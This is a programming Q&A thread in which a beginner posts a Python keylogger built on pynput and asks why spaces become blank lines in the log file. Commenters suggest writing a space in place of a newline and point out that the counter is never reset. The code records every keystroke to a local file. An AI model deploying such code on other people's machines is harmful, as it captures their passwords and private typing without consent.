# how do i remove the empty lines in the output?

Tags: python, pynput

so im trying to make a kind of keylogger which tracks your keyboard and whenever the user exits the program it will save in a text file. However if the user presses space it will leave a full line empty and i am trying to fix it. UPDATE, i have fixed it thank you guys! <3

```
import pynput

from pynput.keyboard import Key, Listener

count = 0
keys = []

def on_press (key) :
    global keys, count

    keys.append(key)
    count += 1
    print('{0} pressed'.format(key))

    if count >= 10:
        count += 1
        write_file(keys)
        keys = []


def write_file(keys):
    with open('log.txt', 'a') as f:
        for key in keys :
            k = str(key).replace("'","")
            if k.find('space') > 0:
                f.write('\n')
            elif k.find('Key') == -1:
                f.write(k)



def on_release(key) :
    if key == Key.esc:
        return False


with Listener (on_press=on_press, on_release=on_release) as listener:
    listener.join()
```

Comment: why do you not reset count to 0 on writing? you keep incrementing it?

Comment: For multiple spaces, you want to put only one new line?

Comment: You want a space instead of a newline for each space press? just do `f.write(' ')` instead of `f.write('\n')`

Comment: @ShlomoGottlieb Yes, it got fixed now. Thank you so much <3

Answer (score 0):

```
f.write(' ')
```

instead of

```
f.write('\n')
```

will do what you need.